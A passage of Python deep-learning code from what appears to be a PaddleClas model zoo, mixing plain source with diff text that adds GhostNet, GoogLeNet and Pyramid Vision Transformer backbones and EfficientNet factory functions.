    # Bug fix: every factory below accepted `use_ssld` but never forwarded it,
    # so the SSLD weights could never actually be selected. Forward it now,
    # matching the ghostnet/googlenet factories in this same change set.
    _load_pretrained(
        pretrained, model, MODEL_URLS[url_key], use_ssld=use_ssld)
    return model


def EfficientNetB0_small(padding_type='DYNAMIC',
                         override_params=None,
                         use_se=False,
                         pretrained=False,
                         use_ssld=False,
                         **kwargs):
    """EfficientNet-B0 variant without SE blocks, using dynamic padding."""
    return _build_efficientnet('b0', "EfficientNetB0_small", padding_type,
                               override_params, use_se, pretrained, use_ssld,
                               **kwargs)


def EfficientNetB0(padding_type='SAME',
                   override_params=None,
                   use_se=True,
                   pretrained=False,
                   use_ssld=False,
                   **kwargs):
    """EfficientNet-B0."""
    return _build_efficientnet('b0', "EfficientNetB0", padding_type,
                               override_params, use_se, pretrained, use_ssld,
                               **kwargs)


def EfficientNetB1(padding_type='SAME',
                   override_params=None,
                   use_se=True,
                   pretrained=False,
                   use_ssld=False,
                   **kwargs):
    """EfficientNet-B1."""
    return _build_efficientnet('b1', "EfficientNetB1", padding_type,
                               override_params, use_se, pretrained, use_ssld,
                               **kwargs)


def EfficientNetB2(padding_type='SAME',
                   override_params=None,
                   use_se=True,
                   pretrained=False,
                   use_ssld=False,
                   **kwargs):
    """EfficientNet-B2."""
    return _build_efficientnet('b2', "EfficientNetB2", padding_type,
                               override_params, use_se, pretrained, use_ssld,
                               **kwargs)


def EfficientNetB3(padding_type='SAME',
                   override_params=None,
                   use_se=True,
                   pretrained=False,
                   use_ssld=False,
                   **kwargs):
    """EfficientNet-B3."""
    return _build_efficientnet('b3', "EfficientNetB3", padding_type,
                               override_params, use_se, pretrained, use_ssld,
                               **kwargs)


def EfficientNetB4(padding_type='SAME',
                   override_params=None,
                   use_se=True,
                   pretrained=False,
                   use_ssld=False,
                   **kwargs):
    """EfficientNet-B4."""
    return _build_efficientnet('b4', "EfficientNetB4", padding_type,
                               override_params, use_se, pretrained, use_ssld,
                               **kwargs)


def EfficientNetB5(padding_type='SAME',
                   override_params=None,
                   use_se=True,
                   pretrained=False,
                   use_ssld=False,
                   **kwargs):
    """EfficientNet-B5."""
    return _build_efficientnet('b5', "EfficientNetB5", padding_type,
                               override_params, use_se, pretrained, use_ssld,
                               **kwargs)


def EfficientNetB6(padding_type='SAME',
                   override_params=None,
                   use_se=True,
                   pretrained=False,
                   use_ssld=False,
                   **kwargs):
    """EfficientNet-B6."""
    return _build_efficientnet('b6', "EfficientNetB6", padding_type,
                               override_params, use_se, pretrained, use_ssld,
                               **kwargs)


def EfficientNetB7(padding_type='SAME',
                   override_params=None,
                   use_se=True,
                   pretrained=False,
                   use_ssld=False,
                   **kwargs):
    """EfficientNet-B7."""
    return _build_efficientnet('b7', "EfficientNetB7", padding_type,
                               override_params, use_se, pretrained, use_ssld,
                               **kwargs)
+# See the License for the specific language governing permissions and +# limitations under the License. + +import math +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, AdaptiveAvgPool2D, Linear +from paddle.regularizer import L2Decay +from paddle.nn.initializer import Uniform, KaimingNormal + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "GhostNet_x0_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/GhostNet_x0_5_pretrained.pdparams", + "GhostNet_x1_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/GhostNet_x1_0_pretrained.pdparams", + "GhostNet_x1_3": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/GhostNet_x1_3_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + in_channels, + out_channels, + kernel_size, + stride=1, + groups=1, + act="relu", + name=None): + super(ConvBNLayer, self).__init__() + self._conv = Conv2D( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=(kernel_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr( + initializer=KaimingNormal(), name=name + "_weights"), + bias_attr=False) + bn_name = name + "_bn" + + self._batch_norm = BatchNorm( + num_channels=out_channels, + act=act, + param_attr=ParamAttr( + name=bn_name + "_scale", regularizer=L2Decay(0.0)), + bias_attr=ParamAttr( + name=bn_name + "_offset", regularizer=L2Decay(0.0)), + moving_mean_name=bn_name + "_mean", + moving_variance_name=bn_name + "_variance") + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class SEBlock(nn.Layer): + def __init__(self, num_channels, reduction_ratio=4, name=None): + super(SEBlock, self).__init__() + self.pool2d_gap = AdaptiveAvgPool2D(1) + self._num_channels = num_channels + stdv = 
1.0 / math.sqrt(num_channels * 1.0) + med_ch = num_channels // reduction_ratio + self.squeeze = Linear( + num_channels, + med_ch, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_1_weights"), + bias_attr=ParamAttr(name=name + "_1_offset")) + stdv = 1.0 / math.sqrt(med_ch * 1.0) + self.excitation = Linear( + med_ch, + num_channels, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_2_weights"), + bias_attr=ParamAttr(name=name + "_2_offset")) + + def forward(self, inputs): + pool = self.pool2d_gap(inputs) + pool = paddle.squeeze(pool, axis=[2, 3]) + squeeze = self.squeeze(pool) + squeeze = F.relu(squeeze) + excitation = self.excitation(squeeze) + excitation = paddle.clip(x=excitation, min=0, max=1) + excitation = paddle.unsqueeze(excitation, axis=[2, 3]) + out = paddle.multiply(inputs, excitation) + return out + + +class GhostModule(nn.Layer): + def __init__(self, + in_channels, + output_channels, + kernel_size=1, + ratio=2, + dw_size=3, + stride=1, + relu=True, + name=None): + super(GhostModule, self).__init__() + init_channels = int(math.ceil(output_channels / ratio)) + new_channels = int(init_channels * (ratio - 1)) + self.primary_conv = ConvBNLayer( + in_channels=in_channels, + out_channels=init_channels, + kernel_size=kernel_size, + stride=stride, + groups=1, + act="relu" if relu else None, + name=name + "_primary_conv") + self.cheap_operation = ConvBNLayer( + in_channels=init_channels, + out_channels=new_channels, + kernel_size=dw_size, + stride=1, + groups=init_channels, + act="relu" if relu else None, + name=name + "_cheap_operation") + + def forward(self, inputs): + x = self.primary_conv(inputs) + y = self.cheap_operation(x) + out = paddle.concat([x, y], axis=1) + return out + + +class GhostBottleneck(nn.Layer): + def __init__(self, + in_channels, + hidden_dim, + output_channels, + kernel_size, + stride, + use_se, + name=None): + super(GhostBottleneck, self).__init__() + self._stride = stride + self._use_se = 
use_se + self._num_channels = in_channels + self._output_channels = output_channels + self.ghost_module_1 = GhostModule( + in_channels=in_channels, + output_channels=hidden_dim, + kernel_size=1, + stride=1, + relu=True, + name=name + "_ghost_module_1") + if stride == 2: + self.depthwise_conv = ConvBNLayer( + in_channels=hidden_dim, + out_channels=hidden_dim, + kernel_size=kernel_size, + stride=stride, + groups=hidden_dim, + act=None, + name=name + + "_depthwise_depthwise" # looks strange due to an old typo, will be fixed later. + ) + if use_se: + self.se_block = SEBlock(num_channels=hidden_dim, name=name + "_se") + self.ghost_module_2 = GhostModule( + in_channels=hidden_dim, + output_channels=output_channels, + kernel_size=1, + relu=False, + name=name + "_ghost_module_2") + if stride != 1 or in_channels != output_channels: + self.shortcut_depthwise = ConvBNLayer( + in_channels=in_channels, + out_channels=in_channels, + kernel_size=kernel_size, + stride=stride, + groups=in_channels, + act=None, + name=name + + "_shortcut_depthwise_depthwise" # looks strange due to an old typo, will be fixed later. 
+ ) + self.shortcut_conv = ConvBNLayer( + in_channels=in_channels, + out_channels=output_channels, + kernel_size=1, + stride=1, + groups=1, + act=None, + name=name + "_shortcut_conv") + + def forward(self, inputs): + x = self.ghost_module_1(inputs) + if self._stride == 2: + x = self.depthwise_conv(x) + if self._use_se: + x = self.se_block(x) + x = self.ghost_module_2(x) + if self._stride == 1 and self._num_channels == self._output_channels: + shortcut = inputs + else: + shortcut = self.shortcut_depthwise(inputs) + shortcut = self.shortcut_conv(shortcut) + return paddle.add(x=x, y=shortcut) + + +class GhostNet(nn.Layer): + def __init__(self, scale, class_num=1000): + super(GhostNet, self).__init__() + self.cfgs = [ + # k, t, c, SE, s + [3, 16, 16, 0, 1], + [3, 48, 24, 0, 2], + [3, 72, 24, 0, 1], + [5, 72, 40, 1, 2], + [5, 120, 40, 1, 1], + [3, 240, 80, 0, 2], + [3, 200, 80, 0, 1], + [3, 184, 80, 0, 1], + [3, 184, 80, 0, 1], + [3, 480, 112, 1, 1], + [3, 672, 112, 1, 1], + [5, 672, 160, 1, 2], + [5, 960, 160, 0, 1], + [5, 960, 160, 1, 1], + [5, 960, 160, 0, 1], + [5, 960, 160, 1, 1] + ] + self.scale = scale + output_channels = int(self._make_divisible(16 * self.scale, 4)) + self.conv1 = ConvBNLayer( + in_channels=3, + out_channels=output_channels, + kernel_size=3, + stride=2, + groups=1, + act="relu", + name="conv1") + # build inverted residual blocks + idx = 0 + self.ghost_bottleneck_list = [] + for k, exp_size, c, use_se, s in self.cfgs: + in_channels = output_channels + output_channels = int(self._make_divisible(c * self.scale, 4)) + hidden_dim = int(self._make_divisible(exp_size * self.scale, 4)) + ghost_bottleneck = self.add_sublayer( + name="_ghostbottleneck_" + str(idx), + sublayer=GhostBottleneck( + in_channels=in_channels, + hidden_dim=hidden_dim, + output_channels=output_channels, + kernel_size=k, + stride=s, + use_se=use_se, + name="_ghostbottleneck_" + str(idx))) + self.ghost_bottleneck_list.append(ghost_bottleneck) + idx += 1 + # build last several layers 
+ in_channels = output_channels + output_channels = int(self._make_divisible(exp_size * self.scale, 4)) + self.conv_last = ConvBNLayer( + in_channels=in_channels, + out_channels=output_channels, + kernel_size=1, + stride=1, + groups=1, + act="relu", + name="conv_last") + self.pool2d_gap = AdaptiveAvgPool2D(1) + in_channels = output_channels + self._fc0_output_channels = 1280 + self.fc_0 = ConvBNLayer( + in_channels=in_channels, + out_channels=self._fc0_output_channels, + kernel_size=1, + stride=1, + act="relu", + name="fc_0") + self.dropout = nn.Dropout(p=0.2) + stdv = 1.0 / math.sqrt(self._fc0_output_channels * 1.0) + self.fc_1 = Linear( + self._fc0_output_channels, + class_num, + weight_attr=ParamAttr( + name="fc_1_weights", initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr(name="fc_1_offset")) + + def forward(self, inputs): + x = self.conv1(inputs) + for ghost_bottleneck in self.ghost_bottleneck_list: + x = ghost_bottleneck(x) + x = self.conv_last(x) + x = self.pool2d_gap(x) + x = self.fc_0(x) + x = self.dropout(x) + x = paddle.reshape(x, shape=[-1, self._fc0_output_channels]) + x = self.fc_1(x) + return x + + def _make_divisible(self, v, divisor, min_value=None): + """ + This function is taken from the original tf repo. + It ensures that all layers have a channel number that is divisible by 8 + It can be seen here: + https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py + """ + if min_value is None: + min_value = divisor + new_v = max(min_value, int(v + divisor / 2) // divisor * divisor) + # Make sure that round down does not go down by more than 10%. 
+ if new_v < 0.9 * v: + new_v += divisor + return new_v + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def GhostNet_x0_5(pretrained=False, use_ssld=False, **kwargs): + model = GhostNet(scale=0.5, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["GhostNet_x0_5"], use_ssld=use_ssld) + return model + + +def GhostNet_x1_0(pretrained=False, use_ssld=False, **kwargs): + model = GhostNet(scale=1.0, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["GhostNet_x1_0"], use_ssld=use_ssld) + return model + + +def GhostNet_x1_3(pretrained=False, use_ssld=False, **kwargs): + model = GhostNet(scale=1.3, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["GhostNet_x1_3"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/googlenet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/googlenet.py new file mode 100644 index 0000000..2252842 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/googlenet.py @@ -0,0 +1,229 @@ +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "GoogLeNet": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/GoogLeNet_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +def xavier(channels, filter_size, name): + stdv = (3.0 / 
(filter_size**2 * channels))**0.5 + param_attr = ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_weights") + return param_attr + + +class ConvLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + act=None, + name=None): + super(ConvLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + + def forward(self, inputs): + y = self._conv(inputs) + return y + + +class Inception(nn.Layer): + def __init__(self, + input_channels, + output_channels, + filter1, + filter3R, + filter3, + filter5R, + filter5, + proj, + name=None): + super(Inception, self).__init__() + + self._conv1 = ConvLayer( + input_channels, filter1, 1, name="inception_" + name + "_1x1") + self._conv3r = ConvLayer( + input_channels, + filter3R, + 1, + name="inception_" + name + "_3x3_reduce") + self._conv3 = ConvLayer( + filter3R, filter3, 3, name="inception_" + name + "_3x3") + self._conv5r = ConvLayer( + input_channels, + filter5R, + 1, + name="inception_" + name + "_5x5_reduce") + self._conv5 = ConvLayer( + filter5R, filter5, 5, name="inception_" + name + "_5x5") + self._pool = MaxPool2D(kernel_size=3, stride=1, padding=1) + + self._convprj = ConvLayer( + input_channels, proj, 1, name="inception_" + name + "_3x3_proj") + + def forward(self, inputs): + conv1 = self._conv1(inputs) + + conv3r = self._conv3r(inputs) + conv3 = self._conv3(conv3r) + + conv5r = self._conv5r(inputs) + conv5 = self._conv5(conv5r) + + pool = self._pool(inputs) + convprj = self._convprj(pool) + + cat = paddle.concat([conv1, conv3, conv5, convprj], axis=1) + cat = F.relu(cat) + return cat + + +class GoogLeNetDY(nn.Layer): + def __init__(self, class_num=1000): + super(GoogLeNetDY, self).__init__() + self._conv = ConvLayer(3, 64, 7, 2, name="conv1") + 
self._pool = MaxPool2D(kernel_size=3, stride=2) + self._conv_1 = ConvLayer(64, 64, 1, name="conv2_1x1") + self._conv_2 = ConvLayer(64, 192, 3, name="conv2_3x3") + + self._ince3a = Inception( + 192, 192, 64, 96, 128, 16, 32, 32, name="ince3a") + self._ince3b = Inception( + 256, 256, 128, 128, 192, 32, 96, 64, name="ince3b") + + self._ince4a = Inception( + 480, 480, 192, 96, 208, 16, 48, 64, name="ince4a") + self._ince4b = Inception( + 512, 512, 160, 112, 224, 24, 64, 64, name="ince4b") + self._ince4c = Inception( + 512, 512, 128, 128, 256, 24, 64, 64, name="ince4c") + self._ince4d = Inception( + 512, 512, 112, 144, 288, 32, 64, 64, name="ince4d") + self._ince4e = Inception( + 528, 528, 256, 160, 320, 32, 128, 128, name="ince4e") + + self._ince5a = Inception( + 832, 832, 256, 160, 320, 32, 128, 128, name="ince5a") + self._ince5b = Inception( + 832, 832, 384, 192, 384, 48, 128, 128, name="ince5b") + + self._pool_5 = AdaptiveAvgPool2D(1) + + self._drop = Dropout(p=0.4, mode="downscale_in_infer") + self._fc_out = Linear( + 1024, + class_num, + weight_attr=xavier(1024, 1, "out"), + bias_attr=ParamAttr(name="out_offset")) + self._pool_o1 = AvgPool2D(kernel_size=5, stride=3) + self._conv_o1 = ConvLayer(512, 128, 1, name="conv_o1") + self._fc_o1 = Linear( + 1152, + 1024, + weight_attr=xavier(2048, 1, "fc_o1"), + bias_attr=ParamAttr(name="fc_o1_offset")) + self._drop_o1 = Dropout(p=0.7, mode="downscale_in_infer") + self._out1 = Linear( + 1024, + class_num, + weight_attr=xavier(1024, 1, "out1"), + bias_attr=ParamAttr(name="out1_offset")) + self._pool_o2 = AvgPool2D(kernel_size=5, stride=3) + self._conv_o2 = ConvLayer(528, 128, 1, name="conv_o2") + self._fc_o2 = Linear( + 1152, + 1024, + weight_attr=xavier(2048, 1, "fc_o2"), + bias_attr=ParamAttr(name="fc_o2_offset")) + self._drop_o2 = Dropout(p=0.7, mode="downscale_in_infer") + self._out2 = Linear( + 1024, + class_num, + weight_attr=xavier(1024, 1, "out2"), + bias_attr=ParamAttr(name="out2_offset")) + + def forward(self, 
inputs): + x = self._conv(inputs) + x = self._pool(x) + x = self._conv_1(x) + x = self._conv_2(x) + x = self._pool(x) + + x = self._ince3a(x) + x = self._ince3b(x) + x = self._pool(x) + + ince4a = self._ince4a(x) + x = self._ince4b(ince4a) + x = self._ince4c(x) + ince4d = self._ince4d(x) + x = self._ince4e(ince4d) + x = self._pool(x) + + x = self._ince5a(x) + ince5b = self._ince5b(x) + + x = self._pool_5(ince5b) + x = self._drop(x) + x = paddle.squeeze(x, axis=[2, 3]) + out = self._fc_out(x) + + x = self._pool_o1(ince4a) + x = self._conv_o1(x) + x = paddle.flatten(x, start_axis=1, stop_axis=-1) + x = self._fc_o1(x) + x = F.relu(x) + x = self._drop_o1(x) + out1 = self._out1(x) + + x = self._pool_o2(ince4d) + x = self._conv_o2(x) + x = paddle.flatten(x, start_axis=1, stop_axis=-1) + x = self._fc_o2(x) + x = self._drop_o2(x) + out2 = self._out2(x) + return [out, out1, out2] + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def GoogLeNet(pretrained=False, use_ssld=False, **kwargs): + model = GoogLeNetDY(**kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["GoogLeNet"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/gvt.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/gvt.py new file mode 100644 index 0000000..3553073 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/gvt.py @@ -0,0 +1,691 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
class GroupAttention(nn.Layer):
    """LSA: locally-grouped self attention — attention within ws x ws windows.
    """

    def __init__(self,
                 dim,
                 num_heads=8,
                 qkv_bias=False,
                 qk_scale=None,
                 attn_drop=0.,
                 proj_drop=0.,
                 ws=1):
        super().__init__()
        # Bug fix: both messages were plain strings, so "{ws}" / "{dim}" were
        # printed literally. They are now real f-strings.
        if ws == 1:
            raise Exception(f"ws {ws} should not be 1")
        if dim % num_heads != 0:
            raise Exception(
                f"dim {dim} should be divided by num_heads {num_heads}.")

        self.dim = dim
        self.num_heads = num_heads
        head_dim = dim // num_heads
        # Default attention scaling: 1/sqrt(head_dim) unless overridden.
        self.scale = qk_scale or head_dim**-0.5

        self.qkv = nn.Linear(dim, dim * 3, bias_attr=qkv_bias)
        self.attn_drop = nn.Dropout(attn_drop)
        self.proj = nn.Linear(dim, dim)
        self.proj_drop = nn.Dropout(proj_drop)
        self.ws = ws

    def forward(self, x, H, W):
        """Window attention over an H x W token grid.

        x is (B, N, C) with N == H * W; assumes H and W are divisible by
        self.ws — TODO confirm the caller pads accordingly.
        """
        B, N, C = x.shape
        h_group, w_group = H // self.ws, W // self.ws
        total_groups = h_group * w_group
        # Regroup tokens into (B, h_group, w_group, ws, ws, C) windows.
        x = x.reshape([B, h_group, self.ws, w_group, self.ws, C]).transpose(
            [0, 1, 3, 2, 4, 5])
        qkv = self.qkv(x).reshape([
            B, total_groups, self.ws**2, 3, self.num_heads, C // self.num_heads
        ]).transpose([3, 0, 1, 4, 2, 5])
        q, k, v = qkv[0], qkv[1], qkv[2]
        attn = paddle.matmul(q, k.transpose([0, 1, 2, 4, 3])) * self.scale

        attn = nn.Softmax(axis=-1)(attn)
        attn = self.attn_drop(attn)
        attn = paddle.matmul(attn, v).transpose([0, 1, 3, 2, 4]).reshape(
            [B, h_group, w_group, self.ws, self.ws, C])

        # Undo the windowing back to (B, N, C).
        x = attn.transpose([0, 1, 3, 2, 4, 5]).reshape([B, N, C])
        x = self.proj(x)
        x = self.proj_drop(x)
        return x
+ + self.dim = dim + self.num_heads = num_heads + head_dim = dim // num_heads + self.scale = qk_scale or head_dim**-0.5 + + self.q = nn.Linear(dim, dim, bias_attr=qkv_bias) + self.kv = nn.Linear(dim, dim * 2, bias_attr=qkv_bias) + self.attn_drop = nn.Dropout(attn_drop) + self.proj = nn.Linear(dim, dim) + self.proj_drop = nn.Dropout(proj_drop) + + self.sr_ratio = sr_ratio + if sr_ratio > 1: + self.sr = nn.Conv2D( + dim, dim, kernel_size=sr_ratio, stride=sr_ratio) + self.norm = nn.LayerNorm(dim) + + def forward(self, x, H, W): + B, N, C = x.shape + q = self.q(x).reshape( + [B, N, self.num_heads, C // self.num_heads]).transpose( + [0, 2, 1, 3]) + + if self.sr_ratio > 1: + x_ = x.transpose([0, 2, 1]).reshape([B, C, H, W]) + tmp_n = H * W // self.sr_ratio**2 + x_ = self.sr(x_).reshape([B, C, tmp_n]).transpose([0, 2, 1]) + x_ = self.norm(x_) + kv = self.kv(x_).reshape( + [B, tmp_n, 2, self.num_heads, C // self.num_heads]).transpose( + [2, 0, 3, 1, 4]) + else: + kv = self.kv(x).reshape( + [B, N, 2, self.num_heads, C // self.num_heads]).transpose( + [2, 0, 3, 1, 4]) + k, v = kv[0], kv[1] + + attn = paddle.matmul(q, k.transpose([0, 1, 3, 2])) * self.scale + attn = nn.Softmax(axis=-1)(attn) + attn = self.attn_drop(attn) + + x = paddle.matmul(attn, v).transpose([0, 2, 1, 3]).reshape([B, N, C]) + x = self.proj(x) + x = self.proj_drop(x) + return x + + +class Block(nn.Layer): + def __init__(self, + dim, + num_heads, + mlp_ratio=4., + qkv_bias=False, + qk_scale=None, + drop=0., + attn_drop=0., + drop_path=0., + act_layer=nn.GELU, + norm_layer=nn.LayerNorm, + sr_ratio=1): + super().__init__() + self.norm1 = norm_layer(dim) + self.attn = Attention( + dim, + num_heads=num_heads, + qkv_bias=qkv_bias, + qk_scale=qk_scale, + attn_drop=attn_drop, + proj_drop=drop, + sr_ratio=sr_ratio) + self.drop_path = DropPath(drop_path) if drop_path > 0. 
else Identity() + self.norm2 = norm_layer(dim) + mlp_hidden_dim = int(dim * mlp_ratio) + self.mlp = Mlp(in_features=dim, + hidden_features=mlp_hidden_dim, + act_layer=act_layer, + drop=drop) + + def forward(self, x, H, W): + x = x + self.drop_path(self.attn(self.norm1(x), H, W)) + x = x + self.drop_path(self.mlp(self.norm2(x))) + return x + + +class SBlock(ViTBlock): + def __init__(self, + dim, + num_heads, + mlp_ratio=4., + qkv_bias=False, + qk_scale=None, + drop=0., + attn_drop=0., + drop_path=0., + act_layer=nn.GELU, + norm_layer=nn.LayerNorm, + sr_ratio=1): + super().__init__(dim, num_heads, mlp_ratio, qkv_bias, qk_scale, drop, + attn_drop, drop_path, act_layer, norm_layer) + + def forward(self, x, H, W): + return super().forward(x) + + +class GroupBlock(ViTBlock): + def __init__(self, + dim, + num_heads, + mlp_ratio=4., + qkv_bias=False, + qk_scale=None, + drop=0., + attn_drop=0., + drop_path=0., + act_layer=nn.GELU, + norm_layer=nn.LayerNorm, + sr_ratio=1, + ws=1): + super().__init__(dim, num_heads, mlp_ratio, qkv_bias, qk_scale, drop, + attn_drop, drop_path, act_layer, norm_layer) + del self.attn + if ws == 1: + self.attn = Attention(dim, num_heads, qkv_bias, qk_scale, + attn_drop, drop, sr_ratio) + else: + self.attn = GroupAttention(dim, num_heads, qkv_bias, qk_scale, + attn_drop, drop, ws) + + def forward(self, x, H, W): + x = x + self.drop_path(self.attn(self.norm1(x), H, W)) + x = x + self.drop_path(self.mlp(self.norm2(x))) + return x + + +class PatchEmbed(nn.Layer): + """ Image to Patch Embedding. + """ + + def __init__(self, img_size=224, patch_size=16, in_chans=3, embed_dim=768): + super().__init__() + if img_size % patch_size != 0: + raise Exception( + f"img_size {img_size} should be divided by patch_size {patch_size}." 
# borrow from PVT https://github.com/whai362/PVT.git
class PyramidVisionTransformer(nn.Layer):
    """Pyramid Vision Transformer (PVT) backbone.

    Runs len(depths) sequential stages; each stage patch-embeds its input,
    adds a learned absolute position embedding, then applies depths[i]
    transformer blocks. A cls token is appended only at the last stage and
    its final embedding is fed to the classification head.
    """

    def __init__(self,
                 img_size=224,
                 patch_size=16,
                 in_chans=3,
                 class_num=1000,
                 embed_dims=[64, 128, 256, 512],
                 num_heads=[1, 2, 4, 8],
                 mlp_ratios=[4, 4, 4, 4],
                 qkv_bias=False,
                 qk_scale=None,
                 drop_rate=0.,
                 attn_drop_rate=0.,
                 drop_path_rate=0.,
                 norm_layer=nn.LayerNorm,
                 depths=[3, 4, 6, 3],
                 sr_ratios=[8, 4, 2, 1],
                 block_cls=Block):
        super().__init__()
        self.class_num = class_num
        self.depths = depths

        # Per-stage patch embeddings, position embeddings and dropouts.
        self.patch_embeds = nn.LayerList()
        self.pos_embeds = nn.ParameterList()
        self.pos_drops = nn.LayerList()
        self.blocks = nn.LayerList()

        for i in range(len(depths)):
            if i == 0:
                self.patch_embeds.append(
                    PatchEmbed(img_size, patch_size, in_chans, embed_dims[i]))
            else:
                # Later stages halve the spatial resolution (patch size 2).
                self.patch_embeds.append(
                    PatchEmbed(img_size // patch_size // 2**(i - 1), 2,
                               embed_dims[i - 1], embed_dims[i]))
            # The last stage reserves one extra position for the cls token.
            patch_num = self.patch_embeds[i].num_patches + 1 if i == len(
                embed_dims) - 1 else self.patch_embeds[i].num_patches
            self.pos_embeds.append(
                self.create_parameter(
                    shape=[1, patch_num, embed_dims[i]],
                    default_initializer=zeros_))
            self.pos_drops.append(nn.Dropout(p=drop_rate))

        dpr = [
            x.numpy()[0]
            for x in paddle.linspace(0, drop_path_rate, sum(depths))
        ]  # stochastic depth decay rule

        cur = 0
        for k in range(len(depths)):
            _block = nn.LayerList([
                block_cls(
                    dim=embed_dims[k],
                    num_heads=num_heads[k],
                    mlp_ratio=mlp_ratios[k],
                    qkv_bias=qkv_bias,
                    qk_scale=qk_scale,
                    drop=drop_rate,
                    attn_drop=attn_drop_rate,
                    drop_path=dpr[cur + i],
                    norm_layer=norm_layer,
                    sr_ratio=sr_ratios[k]) for i in range(depths[k])
            ])
            self.blocks.append(_block)
            cur += depths[k]

        self.norm = norm_layer(embed_dims[-1])

        # cls_token (kept out of weight decay via L2Decay(0.0)).
        self.cls_token = self.create_parameter(
            shape=[1, 1, embed_dims[-1]],
            default_initializer=zeros_,
            attr=paddle.ParamAttr(regularizer=L2Decay(0.0)))

        # classification head
        self.head = nn.Linear(embed_dims[-1],
                              class_num) if class_num > 0 else Identity()

        # init weights
        for pos_emb in self.pos_embeds:
            trunc_normal_(pos_emb)
        self.apply(self._init_weights)

    def _init_weights(self, m):
        if isinstance(m, nn.Linear):
            trunc_normal_(m.weight)
            if isinstance(m, nn.Linear) and m.bias is not None:
                zeros_(m.bias)
        elif isinstance(m, nn.LayerNorm):
            zeros_(m.bias)
            ones_(m.weight)

    def forward_features(self, x):
        B = x.shape[0]
        for i in range(len(self.depths)):
            x, (H, W) = self.patch_embeds[i](x)
            if i == len(self.depths) - 1:
                cls_tokens = self.cls_token.expand([B, -1, -1])
                # Bug fix: paddle.concat takes `axis`, not torch's `dim`;
                # the original `dim=1` would raise TypeError when executed.
                x = paddle.concat([cls_tokens, x], axis=1)
            x = x + self.pos_embeds[i]
            x = self.pos_drops[i](x)
            for blk in self.blocks[i]:
                x = blk(x, H, W)
            if i < len(self.depths) - 1:
                # Bug fix: dropped the trailing `.contiguous()` — that is a
                # torch-ism; paddle.Tensor has no such method and dygraph
                # tensors are already densely laid out.
                x = x.reshape([B, H, W, -1]).transpose([0, 3, 1, 2])
        x = self.norm(x)
        # Return the cls-token embedding.
        return x[:, 0]

    def forward(self, x):
        x = self.forward_features(x)
        x = self.head(x)
        return x
class CPVTV2(PyramidVisionTransformer):
    """
    Use useful results from CPVT. PEG and GAP.
    Therefore, cls token is no longer required.
    PEG is used to encode the absolute position on the fly, which greatly affects the performance when input resolution
    changes during the training (such as segmentation, detection)
    """

    def __init__(self,
                 img_size=224,
                 patch_size=4,
                 in_chans=3,
                 class_num=1000,
                 embed_dims=[64, 128, 256, 512],
                 num_heads=[1, 2, 4, 8],
                 mlp_ratios=[4, 4, 4, 4],
                 qkv_bias=False,
                 qk_scale=None,
                 drop_rate=0.,
                 attn_drop_rate=0.,
                 drop_path_rate=0.,
                 norm_layer=nn.LayerNorm,
                 depths=[3, 4, 6, 3],
                 sr_ratios=[8, 4, 2, 1],
                 block_cls=Block):
        super().__init__(img_size, patch_size, in_chans, class_num, embed_dims,
                         num_heads, mlp_ratios, qkv_bias, qk_scale, drop_rate,
                         attn_drop_rate, drop_path_rate, norm_layer, depths,
